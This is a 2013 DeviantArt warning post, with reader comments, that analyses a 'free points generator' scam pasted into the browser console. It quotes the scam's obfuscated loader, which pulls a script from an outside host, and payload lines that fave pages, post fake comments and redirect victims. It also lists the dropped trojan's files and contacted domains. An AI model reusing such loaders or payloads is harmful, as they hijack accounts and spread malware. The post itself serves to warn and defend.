HOME | DD

Lilyas — Update on the - Get 20K Points - Invasion
#bot #points #spam #troll #spambot
Published: 2013-04-28 12:38:00 +0000 UTC; Views: 17693; Favourites: 109; Downloads: 0
Redirect to original
Description Update April, 29: All spam accounts from last weekend have been deleted by DA staff.

But new spam accounts have been opened. Please report them to the Help Desk and/or leave a comment here or on petersong's page .

Copied from here:
petersong.deviantart.com/art/S…


Before you do anything stupid, please read this

Obviously, this offer is swindling.
And as such it is dangerous for you !

table of contents
  • What it does
  • And then what ?
  • What can we do ?
  • "I installed it, but I'm okay"
  • "OMG my brother did it !"
  • Updates


  • What it does
    "\x61" is just another way to write "a" (ISO hexadecimal encoding)

    Thus,

    ["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79","\x68\x74\x74\x70\x3A\x2F\x2F\x64\x65\x76\x69\x61\x6E\x74\x61\x72\x74\x2E\x68\x70\x2E\x61\x66\x2E\x63\x6D\x2F\x67\x65\x6E\x65\x72\x61\x74\x6F\x72\x2F\x6D\x69\x78\x2E\x6A\x73"]

    is just written words. Script actually.

    You can have it safely translated by using the "unescape" Javascript function, on this part of the script only.

    Once translated, this script does one thing : it includes a bigger, more elaborated script as being part of the DA page.

    This script can be found here :
    deviantart.hp.af.cm/generator/…

    This script will now be able to act in your name

    Note that this script is NOT hosted by deviantart.com website. It is a foreign website, hosted in Cameroon (Africa), in such a way that the smugglers can't be found by regular simple investigations. They are hiding, and hiding well.

    This new script does something else.
    For now (but it might change) :

    document.getElementById("gmi-ResourceViewFaveButton").click();
    It simulates click on the "Fave" button.

    document.getElementById("commentbody").value="It actually works! Wohoooooooo! Thanks!";
    It writes (in your name) a fake comment saying "It actually works! Wohoooooooo! Thanks!".

    setTimeout("document.getElementsByClassName('ll f')[0].click()", 100);
    It programs something that will hide this actions by reopening the comment area once it is posted.

    document.getElementsByClassName("smbutton smbutton-blue smbutton-big comment-submit")[0].click();
    It validates the comment (in you name).

    window.top.location.href='deviantart.hp.af.cm/generator' ;
    alert('DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed')
    It programs a redirection to their website and displays an alert that says "DeviantART: Welcome to deviantART\'s Points Generator! You will be redirected to our generator. Click OK to proceed"

    And then what ?
    And then you wont get any DA points, indeed. I bet you guessed yet…

    Instead, they will say to you "Oh, you don't have this so great plugin, come and download it !", launch the download anyway. And this is where you get screwed if you are gullible enough to run an executable file from a random site hidden in Cameroon…
    I don't know (yet) what this exe file does. But I know what it could do.
    First of it might be (and probably is) a security breach on your computer. Trojan, virus, remote agent…
    Which in turn could be aimed at several things : spreading this publication so that other get screwed, stealing personal information (such as payment card numbers), using your computer as a proxy for networks attacks…

    If you already downloaded the file, please, be very careful. Use antiviral detection and malware removal on your computer now, and in a few days. Firewall protection is a must have.
    The malware might steal your "cookie" too. This means that your password might be compromised. Actually not only for deviantArt.

    What can we do ?
    For now, we can try to warn and inform people.
    Try to make them stop spreading this stupid hoax.
    If you have any idea of what more to do, please, comment.

    "I installed it, but I'm okay"
    Are you so very sure of this ? FYI, virustotal.com ran a virus detection on the exe file using 45 antivirus and states that only 3 of the 45 antivirus he tested found a threat.
    Report can be found here : see the virustotal report
    Now, do as you want.

    "OMG my brother did it !"
    I did not download/run that exe file, am I safe ?
    As far as I know
    • There was no harmful code in the JavaScript stuff that I saw, but it can change at any time
    • Any reasonable browser should not be able to execute a downloaded file without warning you before (and the "plugin" stuff is AFAIK only fake div displayed as part of the internet webpage, then not harmful)
    • I think that the only thing really endangered by the JavaScript is your session cookie, then changing you password might be wise.
    • I have heard of other more sophisticated attacks like buffer overflowing and stuff, but I'm not competent enough to tell you if there is such a threat. Then consider you are not safe until someone can tell us whether there is such a potential threat.

    Thus I would say that as far as I know, you should be relatively safe, but I also know that this is a huge field and that I'm no pro. So you should consider being careful, and having antiviral + firewall protection up to date on your computer (as everyone else).

    Connected Viruses/Malware/Adware identified
    One or several of these malwares might have been dropped on you computer if you had this exe file run on your computer :
    • Trojan
      • Identified by Emsisoft as Trojan.MSIL.Spy.Agent.AMN (A)
      • Identified by Fortinet as MSIL/Agent.HG!tr.spy
      • Identified by ESET-NOD32 as a variant of MSIL/Spy.Agent.HG
      • Identified by many other malware detectors as Trojan.GenericKD.966175
      • This is a serious threat
      • This is a Trojan, which means it is a malicious software spying your computer and sending (or giving access to) this data to malicious people. See the Internet Holy Bible for reference.
      • Some antivirus are free. See the Mighty Source of all Truth for reference.
      • Fresh news here thanks to ~ krisiskiller101 investigations !
        • He was able to get rid of it using MalwareBYTES
        • He confirmed that RASMan service was up on his computer. Though, this service is not supposed to be harmful and might have been up before. It might also be part of the trojan attack that was not turned back up by the fix because it is not harmful alone.
        • Thanks for the info !
    • AdWare.iBryte.H
      • seems to be a recent version of wellknown adware iBryte
      • Only comodo antimalware seems to identify it. Maybe ESET-NOD32 too.
      • Be very careful as searching for "iBryte.H removal" can lead to spywareprotectiontool.com which is a malicious website giving you malware instead of solutions
      • You can find instructions for this adware removal, searching for "iBryte removal", but I don't know if they would work with this version of the adware (please, tell us if you have any success with one of these procedure)
    • Optimum Installer (fs)


    Personal investigations
    I don't have a packed solution. And I won't probably have time enough to investigate thoroughly this stuff.
    Yet, I found some hints, by diving modestly into this sh*t. I share it for people that it might help.
    This program does the following :
    • It mess up your registry in a theatrical way
      • It probably affects the download manager associated with your web browser
      • It probably affects the toolbars in your web browser
      • Writes 'test' everywhere in the registry
      • Mess up with your ie cache
    • Creates files
      • Create an executable file named "D2M-Precheck.exe", hidden in "C:\Document and settings\Your_User_Name\Local Settings\Temp"
      • Create an executable file named "check_offer_rp.dll", hidden in "C:\Document and settings\Your_User_Name\Local Settings\Temp"
      • Create copies of these two files in a subdirectory of "C:\Document and settings\Your_User_Name\Local Settings\Temporary Internet Files\Content.IE5\"
    • Runs the created exe file, which in turn spoils your computer :
      • Creates a new "exe" file named "Impressioner.exe" along with a "System.Data.SQLite.dll" and "imp.dat" files, hidden at the same place : "C:\Document and settings\Your_User_Name\Local Settings\Temp"
    • Transfers data through internet with following addresses
      • imp.oi-imp1.com
      • config.oi-config1.com
      • d1uc4fr8hoy8ts.cloudfront.net
      • cdn.install.oibundles2.com (the only thing done here is downloading the dll file stated before)
      • cache-download.real.com
      • d2m.adk-mobile.com
      • app-bucks.com
      • app-caster.com
      • ns20.real.com
      • ns30.real.com
      • ns40.real.com
      • ns-01.cloudfront.net
      • ns-02.cloudfront.net
      • nsgtm01.ak-networks.com
      • nsgtm02.ak-networks.com
      • nsgtm03.ak-networks.com
      • scenic-screensavers.com
      • ns7.markmonitor.com
      • ns6.markmonitor.com
      • ns2.markmonitor.com
      • ns4.markmonitor.com
      • ns5.markmonitor.com
      • ns3.markmonitor.com
      • ns1.markmonitor.com
    • Probably displays advertising


    Be careful : this is not an exhaustive list. And all that is listed above is not necessarily harmful (e.g. SQLite.dll is just a database they use, not a virus itself, probably). Do not edit your Registry if you don't know exactly what you are doing.
    Moreover, I have no idea on what this "impressioner.exe" does. Then there might be a lot more mess to clean. By the way, if you were infected and are able to find this file, please, consider sending a copy of it to me.
    -edit- Okay, it will be hard to find this file on your drive : this file "does something" (including turning up RASMAN Service) and deletes itself. This is really not comforting.

    This said, and with no guarantee of any kind, "do it at your own risks" and stuff, I think that you can safely delete the exe and dll files mentioned above. It might get you rid of part of the infection.

    If you have more information or if you can teach me something on this kind of investigations, please, contact me, I will update.
    This information might even be wrong depending on your OS and configuration !


    Updates
    • There is at least 2 scripts, now : mix.js and nr.js (second one only fav without leaving a comment)
    • There is at least two messages spreading this sh*t
    • It seems I was totally wrong thinking that infected people were spreading those messages. It is more probably bots registering and posting every x seconds





    Thank for reading.
Related content
Comments: 139

Lilyas In reply to ??? [2013-05-03 01:26:24 +0000 UTC]

They are banned quickly meanwhile. DA has learned....

👍: 0 ⏩: 1

Skelettaa In reply to Lilyas [2013-05-03 21:44:31 +0000 UTC]

Not fast enough.

👍: 0 ⏩: 0

Skelettaa [2013-05-02 16:48:06 +0000 UTC]

Here is another account doing this >> [link]

👍: 0 ⏩: 1

Username-91 In reply to Skelettaa [2013-05-03 10:00:09 +0000 UTC]

Banned! At last DA has learn his lesson. Now we all have to do is learn the DA admins to take an actions on art thief's no matter that reports have been posted by fans instead of owners...

👍: 0 ⏩: 2

Skelettaa In reply to Username-91 [2013-05-03 21:45:36 +0000 UTC]

* lol lets THEM be lazier.

Apologies, I am tired. Been a busy day.

👍: 0 ⏩: 1

Username-91 In reply to Skelettaa [2013-05-04 06:23:48 +0000 UTC]

It's fine.

👍: 0 ⏩: 0

Skelettaa In reply to Username-91 [2013-05-03 21:45:12 +0000 UTC]

Ugh I don't think that will ever change to being the way it was. Makes it harder for the rest of us and lets me be lazier.

👍: 0 ⏩: 1

Username-91 In reply to Skelettaa [2013-05-04 06:25:02 +0000 UTC]

I'm lazy too. I don't even pay attention on what I'm writing when I'm talking to someone.

👍: 0 ⏩: 0

KibaWhiteWarrior [2013-05-02 16:39:41 +0000 UTC]

My friend lost her account to this. Don't do it 👍: 0 ⏩: 0

mrento [2013-05-02 14:10:16 +0000 UTC]

I reported another incarnation of this from about 30 minutes ago, this one using a server in Grenada (.gd)

👍: 0 ⏩: 0

MassiveMaster In reply to ??? [2013-05-01 09:09:29 +0000 UTC]

an now it is back :
[link]

👍: 0 ⏩: 1

Lilyas In reply to MassiveMaster [2013-05-01 13:37:11 +0000 UTC]

Naaaah..... Gone......

👍: 0 ⏩: 1

MassiveMaster In reply to Lilyas [2013-05-01 22:49:59 +0000 UTC]

it is back an announces a contest like all the other give away contests but say you have to visit a link. Many young members will fall for this one.. again

👍: 0 ⏩: 1

Lilyas In reply to MassiveMaster [2013-05-01 23:53:18 +0000 UTC]

Damn!

👍: 0 ⏩: 0

WIKIPEDIAUSER In reply to ??? [2013-05-01 09:01:02 +0000 UTC]

Thanks you So Much Comrade

👍: 0 ⏩: 0

kenan89 [2013-05-01 08:21:04 +0000 UTC]

I clicked get the 20k thingy picture, no download or no link I only clicked the picture were the comments were disabled, am i safe? :c

👍: 0 ⏩: 1

Kaltiaem In reply to kenan89 [2013-05-01 15:35:33 +0000 UTC]

If you just click on it then you're fine

👍: 0 ⏩: 0

Cassini90125 [2013-04-30 22:36:53 +0000 UTC]

Faved, and will gladly pass this around.

This should be part of the weekly site update but of course it won't be.

👍: 0 ⏩: 0

XxNyanxChanxX In reply to ??? [2013-04-30 06:14:12 +0000 UTC]

It seems that it's started up again; [link]
Hopefully the staff can terminate that and any other spam accounts soon =n=;;

👍: 0 ⏩: 1

Lilyas In reply to XxNyanxChanxX [2013-04-30 11:22:25 +0000 UTC]

This one is gone.

👍: 0 ⏩: 0

codebreak31 [2013-04-30 03:28:59 +0000 UTC]

Am I doomed? My brother executed the script but didn't download anything, and now i'm experiencing network problems, my router is connected to the internet, I can access but sometime times out. And my MS Word 2010 wont save. Am I infected? What are the things I need to do?

👍: 0 ⏩: 1

Lilyas In reply to codebreak31 [2013-04-30 03:39:46 +0000 UTC]

There are a lot of things that can be done to detect and remove malware of viruses like running several security and cleaning programs. I would suggest you describe your problem(s) in short words to Mr. Google and search the forums for answers.

👍: 0 ⏩: 2

codebreak31 In reply to Lilyas [2013-04-30 05:23:45 +0000 UTC]

I will definitely do that, thanks for the suggestion

👍: 0 ⏩: 0

pushyreeder In reply to Lilyas [2013-04-30 04:04:31 +0000 UTC]

Heh, you can delete this now, they're long gone.

👍: 0 ⏩: 1

Lilyas In reply to pushyreeder [2013-04-30 04:08:10 +0000 UTC]

But the trouble they caused is not.

👍: 0 ⏩: 1

pushyreeder In reply to Lilyas [2013-04-30 04:09:27 +0000 UTC]

How, i wonder.

👍: 0 ⏩: 0

CrwnPrince In reply to ??? [2013-04-29 22:39:17 +0000 UTC]

Wow this is really scarey and strange.. Fortunately i don't do the point thingy.. Im going to actually have to find out what it is about too...

👍: 0 ⏩: 0

seopard In reply to ??? [2013-04-29 21:08:50 +0000 UTC]

Thank You so much for warning us!

👍: 0 ⏩: 0

DeadFeesh24 [2013-04-29 20:30:01 +0000 UTC]

Hey, has anyone thought of having a person on a mac download it, since they can't run exe? I have an old mac of mine that I'd be willing to use to get all the files. But I'm not program savvy at all, and I really don't know what is going on. But if it helps, the offer stands.

👍: 0 ⏩: 0

Orange-Zeppelin [2013-04-29 18:49:47 +0000 UTC]

Thank you for posting all this info. Trojans are like, the antithesis of enjoyable.
Come on, Camaroonian web scammers! You're making your country look bad!

👍: 0 ⏩: 0

Ainieve [2013-04-29 17:02:33 +0000 UTC]

jadgfiahjsfkd Freakin' people!! Leave us Deviants ALONE!! *flail* We don't want spam, WE WANT ART!!! *rageface*

Thanks for this! x3

👍: 0 ⏩: 0

sugarislife28 [2013-04-29 14:57:28 +0000 UTC]

I may be mistaken but I think another one popped up [link]

👍: 0 ⏩: 1

Lilyas In reply to sugarislife28 [2013-04-29 15:12:17 +0000 UTC]

No, you are right.....

👍: 0 ⏩: 1

sugarislife28 In reply to Lilyas [2013-04-29 16:16:23 +0000 UTC]

just when we think we get rid of it another pops up

👍: 0 ⏩: 0

luckykitten29 [2013-04-29 08:25:58 +0000 UTC]

i was going to use the code but i didn't cuz i was too lazy before i got warned I LOVE YOU LAZINESS

👍: 0 ⏩: 0

Hawkieface [2013-04-29 07:09:56 +0000 UTC]

Indeed. Will spread the word.

Thanks honey!

👍: 0 ⏩: 0

SerinFel [2013-04-29 05:57:22 +0000 UTC]

Thanks for posting the info. I just saw two variants of this listed in the feed of the main page on log-in and was curious of how nasty a scam it was. I'm faving and sharing to spread the warning.

👍: 0 ⏩: 1

PetersonG In reply to SerinFel [2013-04-29 14:42:41 +0000 UTC]

You're welcome

👍: 0 ⏩: 0

Shadowash1 In reply to ??? [2013-04-29 03:37:01 +0000 UTC]

I am confused where the link might be located on the page when it pops up.

👍: 0 ⏩: 0

CocoBeanie [2013-04-29 01:33:18 +0000 UTC]

Okay this is for real stupid the people really should get what ever they use TAKEN THE FREAKING AWAY I have so much freaking trouble with my computer it has been in and out of the shop 4 freak in times !!!!!!!!!!!!! Okay I hate the people who do this I WISH IT WOULD STOP I've spent 490 on my laptop and trust me I AM NOT paying it again . And to make this even more fun the guy can't even fix it -.- but I am never going there again I haven't seen this around but I will defo share on my wall and put it in my favs . I'm on my iPad and it takes FORVER to use ahah . BUT PEOPLE BE AWARE OF WHAT YOU CLICK ON . My mom click on a ad on her computer and the whatever stole her pictures and did a crap load of stuff -.- that's another reason why I hate these people .

👍: 0 ⏩: 0

poochie10502 In reply to ??? [2013-04-29 01:03:13 +0000 UTC]

I saw one of those on the front page, and I knew it was a scam. I went to the affected's page and saw this link in one of the comments. Thank you, this will definitely help a lot of users!

👍: 0 ⏩: 0

KIWIKlTTEN In reply to ??? [2013-04-29 00:54:40 +0000 UTC]

What the fuck is it with people giving others computer viruses all of a sudden? Is it like a new trend or something? lmao

👍: 0 ⏩: 1

Lilyas In reply to KIWIKlTTEN [2013-04-29 03:18:09 +0000 UTC]

It's a permanent trend since the first days of the Internet.

👍: 0 ⏩: 1

KIWIKlTTEN In reply to Lilyas [2013-04-29 03:20:34 +0000 UTC]

And it's kind of showing up a lot lately, there wasn't as much as there are nowadays.

👍: 0 ⏩: 0

Edvyle-The-Grovyle [2013-04-29 00:39:51 +0000 UTC]

I accidentally opened it...Of course I pressed x right away...will it still send a virus into my computer?

👍: 0 ⏩: 1

Lilyas In reply to Edvyle-The-Grovyle [2013-04-29 03:16:33 +0000 UTC]

You mean you viewed the "deviation"? Nothing can happen to you as long as you don't copy the code and paste it into the console of your browser.

👍: 0 ⏩: 1

Edvyle-The-Grovyle In reply to Lilyas [2013-04-29 04:10:16 +0000 UTC]

I accidentally pressed enter on the code thingy in the console. After seeing ur post though, i deleted the file, ran a full scan, and cleared all of my auto-fills, "remembering"-passwords, and cookies

👍: 0 ⏩: 1

Lilyas In reply to Edvyle-The-Grovyle [2013-04-29 13:59:05 +0000 UTC]

I hope you are lucky.

👍: 0 ⏩: 1

Edvyle-The-Grovyle In reply to Lilyas [2013-04-29 19:52:13 +0000 UTC]

Yay....It looks like my computer is okay! I checked if the person hacked into my account, nothing! YAY!

👍: 0 ⏩: 0

BelieveInLovingMe [2013-04-28 23:59:39 +0000 UTC]

It didn't work on me(luckily), because I've virus-proofed my computer. Thank goodness.

👍: 0 ⏩: 0


| Next =>